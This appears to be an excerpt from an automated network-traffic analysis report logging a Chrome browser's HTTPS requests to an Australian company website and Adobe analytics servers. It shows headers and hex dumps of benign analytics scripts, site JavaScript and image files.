                                                                                                                                                                                                            2024-11-06 05:29:52 UTC735INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 61 2c 72 2c 69 2c 74 2c 79 29 7b 66 75 6e 63 74 69 6f 6e 20 73 79 6e 63 28 29 7b 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 2e 63 6c 61 72 69 74 79 2e 6d 73 2f 63 2e 67 69 66 22 7d 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 73 79 6e 63 28 29 3a 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 73 79 6e 63 29 3b 69 66 28 61 5b 63 5d 2e 76 7c 7c 61 5b 63 5d 2e 74 29 72 65 74 75 72 6e 20 61 5b 63 5d 28 22 65 76 65 6e 74 22 2c 63 2c 22 64 75 70 2e 22 2b 69 2e 70 72 6f 6a 65 63 74 49 64 29 3b 61 5b 63 5d 2e 74 3d 21 30 2c 28 74 3d 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 72 29 29 2e
                                                                                                                                                                                                            Data Ascii: !function(c,l,a,r,i,t,y){function sync(){(new Image).src="https://c.clarity.ms/c.gif"}"complete"==document.readyState?sync():window.addEventListener("load",sync);if(a[c].v||a[c].t)return a[c]("event",c,"dup."+i.projectId);a[c].t=!0,(t=l.createElement(r)).


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            117192.168.2.457799162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC596OUTGET /etc.clientlibs/clientlibs/granite/utils.lc-899004cc02c33efc1f6694b1aee587fd-lc.min.js HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:52 GMT
                                                                                                                                                                                                            Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            cache-control: public, max-age=2592000, immutable
                                                                                                                                                                                                            last-modified: Tue, 27 Feb 2024 20:17:52 GMT
                                                                                                                                                                                                            etag: W/"2151-2386f26fb1bdc0-gzip"
                                                                                                                                                                                                            x-vhost: publish
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31557600
                                                                                                                                                                                                            X-Served-By: cache-sjc1000105-SJC
                                                                                                                                                                                                            X-Cache: HIT
                                                                                                                                                                                                            X-Timer: S1710180973.161103,VS0,VS0,VE1
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 529070
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b0361d056b3f-DFW
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC758INData Raw: 32 31 35 31 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 63 28 29 3a 28 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 3d 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 7c 7c 7b 7d 29 2e 53 6c 69 6e 67 3d 63 28 29 7d 29 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 53 45 4c 45 43 54 4f 52 5f 49 4e 46 49 4e 49 54 59 3a 22 2e 69 6e 66 69 6e 69 74 79 22 2c 43 48 41 52 53 45 54 3a 22 5f 63 68 61 72 73 65 74 5f 22 2c 53 54 41 54 55 53 3a 22 3a 73 74 61 74 75 73 22 2c 53 54 41 54 55 53 5f 42 52 4f 57 53 45 52 3a 22 62 72 6f 77 73 65 72 22 2c 4f 50 45 52 41 54 49 4f 4e 3a 22 3a 6f 70 65 72 61 74
                                                                                                                                                                                                            Data Ascii: 2151(function(c){"object"===typeof module&&module.exports?module.exports=c():(window.Granite=window.Granite||{}).Sling=c()})(function(){return{SELECTOR_INFINITY:".infinity",CHARSET:"_charset_",STATUS:":status",STATUS_BROWSER:"browser",OPERATION:":operat
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 74 69 6c 3d 63 28 29 7d 29 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 70 61 74 63 68 54 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 63 2c 68 29 7b 69 66 28 68 29 69 66 28 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 5d 22 21 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 68 29 29 63 3d 63 2e 72 65 70 6c 61 63 65 28 22 7b 30 7d 22 2c 68 29 3b 65 6c 73 65 20 66 6f 72 28 76 61 72 20 65 3d 30 3b 65 3c 68 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 63 3d 63 2e 72 65 70 6c 61 63 65 28 22 7b 22 2b 65 2b 22 7d 22 2c 68 5b 65 5d 29 3b 72 65 74 75 72 6e 20 63 7d 2c 67 65 74 54 6f 70 57 69 6e 64 6f 77 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 77 69 6e 64 6f 77 3b 69 66 28 74 68 69 73 2e 69 46 72 61 6d 65
                                                                                                                                                                                                            Data Ascii: til=c()})(function(){return{patchText:function(c,h){if(h)if("[object Array]"!==Object.prototype.toString.call(h))c=c.replace("{0}",h);else for(var e=0;e<h.length;e++)c=c.replace("{"+e+"}",h[e]);return c},getTopWindow:function(){var c=window;if(this.iFrame
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 29 7b 6e 75 6c 6c 3d 3d 3d 65 26 26 28 65 3d 64 2e 64 65 74 65 63 74 43 6f 6e 74 65 78 74 50 61 74 68 28 29 29 3b 72 65 74 75 72 6e 20 65 7d 2c 64 65 74 65 63 74 43 6f 6e 74 65 78 74 50 61 74 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 43 51 55 52 4c 49 6e 66 6f 29 65 3d 43 51 55 52 4c 49 6e 66 6f 2e 63 6f 6e 74 65 78 74 50 61 74 68 7c 7c 22 22 3b 65 6c 73 65 7b 66 6f 72 28 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 2c 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 62 2b 2b 29 7b 76 61 72 20 66 3d 6d 2e 65 78 65 63 28 61 5b 62 5d 2e 73 72 63 29 3b 69 66 28 66 29 72 65 74 75 72 6e 20 65 3d 66 5b 31 5d 7d 65 3d
                                                                                                                                                                                                            Data Ascii: nction(){null===e&&(e=d.detectContextPath());return e},detectContextPath:function(){try{if(window.CQURLInfo)e=CQURLInfo.contextPath||"";else{for(var a=document.getElementsByTagName("script"),b=0;b<a.length;b++){var f=m.exec(a[b].src);if(f)return e=f[1]}e=
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 61 63 65 28 2f 25 35 44 2f 67 2c 22 5d 22 29 3b 61 3d 61 2e 72 65 70 6c 61 63 65 28 2f 5c 3f 2f 67 2c 22 25 33 46 22 29 3b 72 65 74 75 72 6e 20 61 3d 61 2e 72 65 70 6c 61 63 65 28 2f 23 2f 67 2c 22 25 32 33 22 29 7d 2c 68 61 6e 64 6c 65 4c 6f 67 69 6e 52 65 64 69 72 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 6e 29 7b 6e 3d 0a 21 30 3b 61 6c 65 72 74 28 47 72 61 6e 69 74 65 2e 49 31 38 6e 2e 67 65 74 28 22 59 6f 75 72 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 63 6f 6d 70 6c 65 74 65 64 20 62 65 63 61 75 73 65 20 79 6f 75 20 68 61 76 65 20 62 65 65 6e 20 73 69 67 6e 65 64 20 6f 75 74 2e 22 29 29 3b 76 61 72 20 61 3d 63 2e 67 65 74 54 6f 70 57 69 6e 64 6f 77 28 29 2e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 3b
                                                                                                                                                                                                            Data Ascii: ace(/%5D/g,"]");a=a.replace(/\?/g,"%3F");return a=a.replace(/#/g,"%23")},handleLoginRedirect:function(){if(!n){n=!0;alert(Granite.I18n.get("Your request could not be completed because you have been signed out."));var a=c.getTopWindow().document.location;
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 62 3d 62 7c 7c 64 2e 67 65 74 4c 6f 63 61 6c 65 28 29 3b 69 66 28 21 68 5b 62 5d 29 7b 70 3d 30 3d 3d 3d 62 2e 69 6e 64 65 78 4f 66 28 64 2e 50 53 45 55 44 4f 5f 4c 41 4e 47 55 41 47 45 29 3b 74 72 79 7b 76 61 72 20 66 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 2c 6c 3d 66 2e 6f 70 65 6e 2c 6b 3d 63 2e 65 78 74 65 72 6e 61 6c 69 7a 65 3b 76 61 72 20 71 3d 62 3b 69 66 28 61 29 76 61 72 20 72 3d 65 2b 71 2b 6d 3b 65 6c 73 65 7b 76 61 72 20 74 2c 75 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 68 74 6d 6c 22 29 3b 75 26 26 28 74 3d 75 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 69 31 38 6e 2d 64 69 63 74 69 6f 6e 61 72 79 2d 73 72 63 22 29 29 3b 72 3d 74 3f 74 2e 72 65 70 6c 61 63 65 28 22 7b 6c 6f
                                                                                                                                                                                                            Data Ascii: b=b||d.getLocale();if(!h[b]){p=0===b.indexOf(d.PSEUDO_LANGUAGE);try{var f=new XMLHttpRequest,l=f.open,k=c.externalize;var q=b;if(a)var r=e+q+m;else{var t,u=document.querySelector("html");u&&(t=u.getAttribute("data-i18n-dictionary-src"));r=t?t.replace("{lo
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 28 29 7d 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 63 28 29 3a 28 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 3d 77 69 6e 64 6f 77 2e 47 72 61 6e 69 74 65 7c 7c 7b 7d 29 2e 54 6f 75 63 68 49 6e 64 69 63 61 74 6f 72 3d 63 28 29 7d 29 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 7b 7d 2c 68 3d 5b 5d 3b 72 65 74 75 72 6e 7b 64 65 62 75 67 57 69 74 68 4d 6f 75 73 65 3a 21 31 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 65 2e 75 70 64 61 74 65 28 67 2e 74 6f 75 63 68 65 73 29 3b 72 65 74 75 72 6e 21 30
                                                                                                                                                                                                            Data Ascii: ()});(function(c){"object"===typeof module&&module.exports?module.exports=c():(window.Granite=window.Granite||{}).TouchIndicator=c()})(function(){var c={},h=[];return{debugWithMouse:!1,init:function(){var e=this,m=function(g){e.update(g.touches);return!0
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC934INData Raw: 29 7d 3b 68 2e 67 65 74 43 6f 6f 6b 69 65 4e 61 6d 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 3b 68 2e 67 65 74 57 68 69 74 65 6c 69 73 74 43 6f 6f 6b 69 65 4e 61 6d 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 7d 3b 68 2e 69 73 4f 70 74 65 64 4f 75 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 67 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 2c 70 3d 30 3b 70 3c 67 2e 6c 65 6e 67 74 68 3b 70 2b 2b 29 7b 76 61 72 20 6e 3d 67 5b 70 5d 2e 73 70 6c 69 74 28 22 5c 78 33 64 22 29 5b 30 5d 3b 6e 3d 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 6d 3f 6e 2e 74 72 69 6d 28 29 3a 6e 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 5c 73 5c 75 46 45 46 46 5c 78 41 30
                                                                                                                                                                                                            Data Ascii: )};h.getCookieNames=function(){return e};h.getWhitelistCookieNames=function(){return m};h.isOptedOut=function(){for(var g=document.cookie.split(";"),p=0;p<g.length;p++){var n=g[p].split("\x3d")[0];n=String.prototype.trim?n.trim():n.replace(/^[\s\uFEFF\xA0
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            118192.168.2.45779052.211.141.2184432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC713OUTGET /id?d_visid_ver=5.5.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=812E14B761A133470A495CCA%40AdobeOrg&d_nsid=0&ts=1730870990712 HTTP/1.1
                                                                                                                                                                                                            Host: dpm.demdex.net
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Origin: https://elders.com.au
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC818INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:52 GMT
                                                                                                                                                                                                            Content-Type: application/json;charset=utf-8
                                                                                                                                                                                                            Content-Length: 370
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            X-TID: 7xN2iPGnSS4=
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                            Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                            P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                            Access-Control-Allow-Origin: https://elders.com.au
                                                                                                                                                                                                            Vary: Origin
                                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                                            DCS: dcs-prod-irl1-1-v068-06864c137.edge-irl1.demdex.com 3 ms
                                                                                                                                                                                                            set-cookie: demdex=06707212550236574584203622074167040076; Max-Age=15552000; Expires=Mon, 05 May 2025 05:29:52 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC370INData Raw: 7b 22 64 5f 6d 69 64 22 3a 22 30 31 38 37 38 33 39 32 32 31 38 32 33 34 31 34 31 31 31 33 35 36 37 39 36 33 32 34 32 38 31 39 30 34 35 30 38 39 22 2c 22 69 64 5f 73 79 6e 63 5f 74 74 6c 22 3a 36 30 34 38 30 30 2c 22 64 5f 62 6c 6f 62 22 3a 22 36 47 31 79 6e 59 63 4c 50 75 69 51 78 59 5a 72 73 7a 5f 70 6b 71 66 4c 47 39 79 4d 58 42 70 62 32 7a 58 35 64 76 4a 64 59 51 4a 7a 50 58 49 6d 64 6a 30 79 22 2c 22 64 63 73 5f 72 65 67 69 6f 6e 22 3a 36 2c 22 64 5f 6f 74 74 6c 22 3a 37 32 30 30 2c 22 69 62 73 22 3a 5b 7b 22 69 64 22 3a 22 34 31 31 22 2c 22 74 74 6c 22 3a 31 30 30 38 30 2c 22 74 61 67 22 3a 22 69 6d 67 22 2c 22 66 69 72 65 55 52 4c 53 79 6e 63 22 3a 31 2c 22 73 79 6e 63 4f 6e 50 61 67 65 22 3a 31 2c 22 75 72 6c 22 3a 5b 22 2f 2f 63 6d 2e 65 76 65 72
                                                                                                                                                                                                            Data Ascii: {"d_mid":"01878392218234141113567963242819045089","id_sync_ttl":604800,"d_blob":"6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y","dcs_region":6,"d_ottl":7200,"ibs":[{"id":"411","ttl":10080,"tag":"img","fireURLSync":1,"syncOnPage":1,"url":["//cm.ever


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            119192.168.2.457800172.66.0.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC484OUTGET /content/dam/eld/icons---logos/icons/find-expert.png HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            Cookie: AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CvVersion%7C5.5.0
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC696INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:52 GMT
                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                            Content-Length: 555
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            last-modified: Tue, 11 Jun 2024 06:29:43 GMT
                                                                                                                                                                                                            etag: "0x8DC89DFE156C48F"
                                                                                                                                                                                                            content-disposition: attachment; filename="find-expert.png"; filename*=UTF-8''find-expert.png
                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                            Cache-Control: public, max-age=86400, immutable
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            x-vhost: publish
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-pao-kpao1770025-PAO
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1718122491.698631,VS0,VS0,VE1131
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 1
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b036f8192c98-DFW
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC555INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 16 00 00 00 16 08 06 00 00 00 c4 b4 6c 3b 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 01 c0 49 44 41 54 78 01 ed 54 31 56 c2 40 10 9d 59 f2 b4 d3 d8 59 88 2f 3e b0 15 72 02 f5 06 7a 03 3c 81 7a 02 f5 06 7a 02 f0 04 7a 03 f0 04 f8 c0 12 9e fb 84 c2 ce 60 a5 90 dd 71 16 04 36 04 48 2c e8 fc d5 66 e7 ef 9f 99 9d bf 41 48 81 e6 4e fe 48 0b 38 82 94 d0 fd b0 e2 a4 21 92 a0 32 02 7a 90 12 62 cd 01 01 2b c2 bf f0 ea 85 53 b9 22 06 82 1a 20 ca 45 61 b6 e6 e3 9f 85 09 e0 a6 d0 69 5d 27 f1 22 c2 f5 6d cf 63 0f 96 86 59 d9 e4 fe bb 94 56 38 50 1a 4e fd 6e ab 36 de 68 64 73 27 84 58 44 22 a9 06 aa 66
                                                                                                                                                                                                            Data Ascii: PNGIHDRl;pHYssRGBgAMAaIDATxT1V@YY/>rz<zzz`q6H,fAHNH8!2zb+S" Eai]'"mcYV8PNn6hds'XD"f


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            120192.168.2.457793172.66.0.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC506OUTGET /content/dam/eld/images/homepage-banners/rpu_q2_2024_landingpagebanner.jpg HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            Cookie: AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CvVersion%7C5.5.0
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC757INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:52 GMT
                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                            Content-Length: 93735
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=86400, immutable
                                                                                                                                                                                                            Cf-Bgj: h2pri
                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                            content-disposition: attachment; filename="rpu_q2_2024_landingpagebanner.jpg"; filename*=UTF-8''rpu_q2_2024_landingpagebanner.jpg
                                                                                                                                                                                                            etag: "0x8DCF3252165C79D"
                                                                                                                                                                                                            last-modified: Wed, 23 Oct 2024 05:39:57 GMT
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            x-served-by: cache-pao-kpao1770030-PAO
                                                                                                                                                                                                            x-timer: S1729727994.150794,VS0,VS0,VE1143
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 1
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b0379ee92873-DFW
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC612INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 01 90 02 58 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                                                                                            Data Ascii: JFIF``CCX"}!1AQa"q2
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 0c 03 01 00 02 11 03 11 00 3f 00 fd 53 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a
                                                                                                                                                                                                            Data Ascii: ?S((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
